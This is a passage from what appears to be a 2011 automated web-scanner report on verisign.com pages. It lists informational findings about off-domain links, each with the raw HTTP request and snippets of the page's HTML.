codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en">...[SNIP]... <param name="allowScriptAccess" value="always"> <embed src="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/> </object>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'> Two-Factor Authentication</a>...[SNIP]... 
<li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'> Digital IDs for Secure Email</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'> Detect Fraud Online</a>...[SNIP]... <a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /> </a>...[SNIP]... <p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html"> Email support for login help.</a>...[SNIP]... </div> <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /> </a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'> SSL Certificates Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'> VeriSign Trust™ Seal Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'> Code Signing Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'> Digital IDs for Secure Email Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'> Managed PKI Support</a>...[SNIP]... 
</div> <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /> </a>...[SNIP]... <li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href='https://products.verisign.com/geocenter/reseller/logon.do'> VeriSign Partner Center Sign In</a>...[SNIP]... <div id="emailPrint" class="emailPrint"> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img style="margin-bottom: 0px;" src="/assets/shared/images/dev044079.gif" alt="Email">...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... </p> <a href="http://www.verisign.com/trust-seal/resources/case-studies/myenergysolution/index.html"> Learn more</a>...[SNIP]... <img src="/assets/trust-seal/images/TrustSeal.png" alt="" /> <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH"> Free 60-day trial <span class="smalltext">...[SNIP]... </a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH"> Buy now</a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH"> Renew</a>...[SNIP]... 
</p> <a href="http://www.verisign.com/trust-seal/resources/case-studies/billtiger/index.html"> Learn more</a>...[SNIP]... <img src="/assets/trust-seal/images/TrustSeal.png" alt="" /> <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH"> Free 60-day trial <span class="smalltext">...[SNIP]... </a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH"> Buy now</a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH"> Renew</a>...[SNIP]... </p> <a href="http://www.verisign.com/trust-seal/resources/case-studies/globalvillage/index.html"> Learn more</a>...[SNIP]... <img src="/assets/trust-seal/images/TrustSeal.png" alt="" /> <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH"> Free 60-day trial <span class="smalltext">...[SNIP]... </a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH"> Buy now</a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH"> Renew</a>...[SNIP]... </p> <a href="http://www.verisign.com/trust-seal/resources/case-studies/trademark-company/index.html"> Learn more</a>...[SNIP]... <img src="/assets/trust-seal/images/TrustSeal.png" alt="" /> <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH"> Free 60-day trial <span class="smalltext">...[SNIP]... 
</a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH"> Buy now</a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH"> Renew</a>...[SNIP]... <div id="vid_container"> <script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_nezp_gh3eobtg" width="356" height="224" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"> <param name="movie" value="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" />...[SNIP]... <param name="wmode" value="transparent" /> <embed src="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" bgcolor="#000000" width="356" height="224" name="ooyalaPlayer_nezp_gh3eobtg" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG" pluginspage="http://www.adobe.com/go/getflashplayer"> </embed>...[SNIP]... <p style="width:210px;"> Contact Sales at 0800 56 29 24 or +41 26 429 7929 or <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w18550112675251018"> submit an inquiry online</a>...[SNIP]... </p> <script type="text/javascript" src="http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js"> </script>...[SNIP]... 
<div id="logos" class="floatl"> <a href="http://www.facebook.com/VeriSignAuthentication"> <img src="/assets/trust-seal/images/Facebook.png" alt="Facebook" style="margin-left:34px; margin-right:37px;"/></a><a href="http://www.twitter.com/TrustSeal"> <img src="/assets/trust-seal/images/Twitter.png" alt="Twitter" style="margin-right:37px;"/></a><a href="http://www.youtube.com/user/VeriSignAuth"> <img src="/assets/trust-seal/images/YouTube.png" alt="YouTube" />...[SNIP]... <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7]>...[SNIP]... <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" /> <script type="text/javascript">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script> <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'> News</a></li><li><a href='//blogs.verisign.com/?tid=footer'> Blogs</a>...[SNIP]... <li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'> Worldwide Sites</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'> two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'> identity protection</a>...[SNIP]... 
</a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'> PKI</a>). Symantec products include <a href='http://ch.norton.com/'> Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'> Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'> PC Tools</a>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]... <!-- Promo script--><script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"> </script>...[SNIP]... <!-- Pre-load promo images to display correctly in promo--><script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js"> </script>...[SNIP]...
14.68. http://www.verisign.com/code-signing/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /code-signing/index.html
Issue detail
The page was loaded from a URL containing a query string:
http://www.verisign.com/code-signing/index.html?tid=a_box
The response contains the following links to other domains:
http://forums.sun.com/index.jspa
http://msdn.microsoft.com/en-us/library/aa141471.aspx
http://smallbusiness.norton.com/?inid=soho_verisign_footer
http://us.norton.com/index.jsp
http://www.addthis.com/bookmark.php?v=250
http://www.addthis.com/bookmark.php?v=250&username=verisign
http://www.adobe.com/devnet/air/
http://www.adobe.com/support/director/downloads.html
http://www.geotrust.com/geocenter/customer-login/
http://www.pctools.com/
http://www.symantec.com/
http://www.symantec.com/about/news/release/index.jsp?tid=footer
http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products
http://www.symantec.com/connect/blogs/symantec-wins-code-project-s-2011-members-choice-award-authentication-tools-verisign-code-sign
http://www.verisign.be/
http://www.verisign.ch/
http://www.verisign.de/
http://www.verisign.dk/
http://www.verisign.es/
http://www.verisign.fr/
http://www.verisign.in/
http://www.verisign.it/
http://www.verisign.se/
http://www.verisignchina.com.cn/
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://products.geotrust.com/signup/codesign.do?partner=geotrust.cs.geotrust
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/1072569688/?label=TRqGCKHUsQIQ2Lq4_wM&guid=ON&script=0
Request
GET /code-signing/index.html?tid=a_box HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 103179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--HEADER ASSETS...[SNIP]... <li><a href='//www.verisign.be/'> Belgium</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.dk/'> Denmark</a>...[SNIP]... <li><a href='//www.verisign.fr/'> France</a>...[SNIP]... <li><a href='//www.verisign.de/'> Germany</a>...[SNIP]... <li><a href='//www.verisign.in/'> India</a>...[SNIP]... <li><a href='//www.verisign.it/'> Italy</a>...[SNIP]... <li><a href='//www.verisign.es/'> Spain</a>...[SNIP]... <li><a href='//www.verisign.se/'> Sweden</a>...[SNIP]... <li><a href='//www.verisign.ch/'> Switzerland</a>...[SNIP]... <li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign"> Contact VeriSign</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>...[SNIP]... 
<img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&username=verisign" class="addthis_button" addthis:ui_click="true"> <img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>...[SNIP]... </a> or to <a href="http://forums.sun.com/index.jspa"> Sun Forums</a>...[SNIP]... </a> or to <a href="http://msdn.microsoft.com/en-us/library/aa141471.aspx"> msdn Office Developer Center</a>...[SNIP]... </a> Support or to <a href="http://www.adobe.com/devnet/air/"> Adobe AIR Developer Center</a>...[SNIP]... <p class="buy"> <a href="https://products.geotrust.com/signup/codesign.do?partner=geotrust.cs.geotrust"> BUY NOW</a>...[SNIP]... <p class="renew"> <a href="http://www.geotrust.com/geocenter/customer-login/"> SIGN IN</a>...[SNIP]... </a> or to <a href="http://www.adobe.com/support/director/downloads.html"> Director Support Center</a>...[SNIP]... </div> <a href="http://www.symantec.com/connect/blogs/symantec-wins-code-project-s-2011-members-choice-award-authentication-tools-verisign-code-sign "> <span id="awardBox" class="bottomBoxes">...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'> Contact VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'> About VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'> News</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>). Symantec products include <a href='//us.norton.com/index.jsp'> Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'> Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'> PC Tools</a>...[SNIP]... 
</script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1072569688/?label=TRqGCKHUsQIQ2Lq4_wM&guid=ON&script=0"/> </div>...[SNIP]...
14.69. http://www.verisign.com/trust-seal/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /trust-seal/index.html
Issue detail
The page was loaded from a URL containing a query string:
http://www.verisign.com/trust-seal/index.html?tid=gnps
The response contains the following links to other domains:
http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent
http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2
http://smallbusiness.norton.com/?inid=soho_verisign_footer
http://us.norton.com/index.jsp
http://view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1
http://www.addthis.com/bookmark.php?v=250
http://www.addthis.com/bookmark.php?v=250&username=verisign
http://www.facebook.com/VeriSignAuthentication
http://www.pctools.com/
http://www.symantec.com/
http://www.symantec.com/about/news/release/index.jsp?tid=footer
http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products
http://www.twitter.com/TrustSeal
http://www.verisign.be/
http://www.verisign.ch/
http://www.verisign.de/
http://www.verisign.dk/
http://www.verisign.es/
http://www.verisign.fr/
http://www.verisign.in/
http://www.verisign.it/
http://www.verisign.se/
http://www.verisignchina.com.cn/
http://www.youtube.com/user/VeriSignAuth
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:13 GMT Content-Type: text/html Content-Length: 49851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META HTTP-EQUIV="X-UA-Comp...[SNIP]... <noscript> <iframe src="//view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"> </iframe>...[SNIP]... <li><a href='//www.verisign.be/'> Belgium</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.dk/'> Denmark</a>...[SNIP]... <li><a href='//www.verisign.fr/'> France</a>...[SNIP]... <li><a href='//www.verisign.de/'> Germany</a>...[SNIP]... <li><a href='//www.verisign.in/'> India</a>...[SNIP]... <li><a href='//www.verisign.it/'> Italy</a>...[SNIP]... <li><a href='//www.verisign.es/'> Spain</a>...[SNIP]... <li><a href='//www.verisign.se/'> Sweden</a>...[SNIP]... <li><a href='//www.verisign.ch/'> Switzerland</a>...[SNIP]... <li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign"> Contact VeriSign</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... 
<div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>...[SNIP]... <img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&username=verisign" class="addthis_button" addthis:ui_click="true"> <img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>...[SNIP]... <div id="vid_container"> <script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_nezp_gh3eobtg" width="356" height="224" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"> <param name="movie" value="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" />...[SNIP]... <param name="wmode" value="transparent" /> <embed src="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" bgcolor="#000000" width="356" height="224" name="ooyalaPlayer_nezp_gh3eobtg" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG" pluginspage="http://www.adobe.com/go/getflashplayer"> </embed>...[SNIP]... 
<div id="logos" class="floatl"> <a href="http://www.facebook.com/VeriSignAuthentication"> <img src="/assets/trust-seal/images/Facebook.png" alt="Facebook" style="margin-left:34px; margin-right:37px;"/></a><a href="http://www.twitter.com/TrustSeal"> <img src="/assets/trust-seal/images/Twitter.png" alt="Twitter" style="margin-right:37px;"/></a><a href="http://www.youtube.com/user/VeriSignAuth"> <img src="/assets/trust-seal/images/YouTube.png" alt="YouTube" />...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'> Contact VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'> About VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'> News</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>). Symantec products include <a href='//us.norton.com/index.jsp'> Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'> Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'> PC Tools</a>...[SNIP]...
14.70. http://www.verisign.com/verisign-worldwide/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /verisign-worldwide/index.html
Issue detail
The page was loaded from a URL containing a query string:
http://www.verisign.com/verisign-worldwide/index.html?tid=footer
The response contains the following links to other domains:
http://smallbusiness.norton.com/?inid=soho_verisign_footer
http://us.norton.com/index.jsp
http://www.addthis.com/bookmark.php?v=250
http://www.addthis.com/bookmark.php?v=250&username=verisign
http://www.pctools.com/
http://www.symantec.com/
http://www.symantec.com/about/news/release/index.jsp?tid=footer
http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products
http://www.verisign.be/
http://www.verisign.ch/
http://www.verisign.de/
http://www.verisign.dk/
http://www.verisign.es/
http://www.verisign.fr/
http://www.verisign.in/
http://www.verisign.it/
http://www.verisign.se/
http://www.verisignchina.com.cn/
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /verisign-worldwide/index.html?tid=footer HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html Content-Length: 42646 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte...[SNIP]... <li><a href='//www.verisign.be/'> Belgium</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.dk/'> Denmark</a>...[SNIP]... <li><a href='//www.verisign.fr/'> France</a>...[SNIP]... <li><a href='//www.verisign.de/'> Germany</a>...[SNIP]... <li><a href='//www.verisign.in/'> India</a>...[SNIP]... <li><a href='//www.verisign.it/'> Italy</a>...[SNIP]... <li><a href='//www.verisign.es/'> Spain</a>...[SNIP]... <li><a href='//www.verisign.se/'> Sweden</a>...[SNIP]... <li><a href='//www.verisign.ch/'> Switzerland</a>...[SNIP]... <li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign"> Contact VeriSign</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>...[SNIP]... 
<img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&username=verisign" class="addthis_button" addthis:ui_click="true"> <img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>...[SNIP]... <p name="p1" id="p1"> VeriSign Authentication Services, now part of <a href="//www.symantec.com"> Symantec Corp.</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.fr/"> France</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.de/"> Germany</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.it/"> Italy</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.es/"> Spain</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <p class="greytext"> If your country is not listed above please visit our English language site <a id="qlinks" class="qlink greytext" target="_top" href="//www.verisign.ch/"> VeriSign Switzerland</a>...[SNIP]... <li> <a 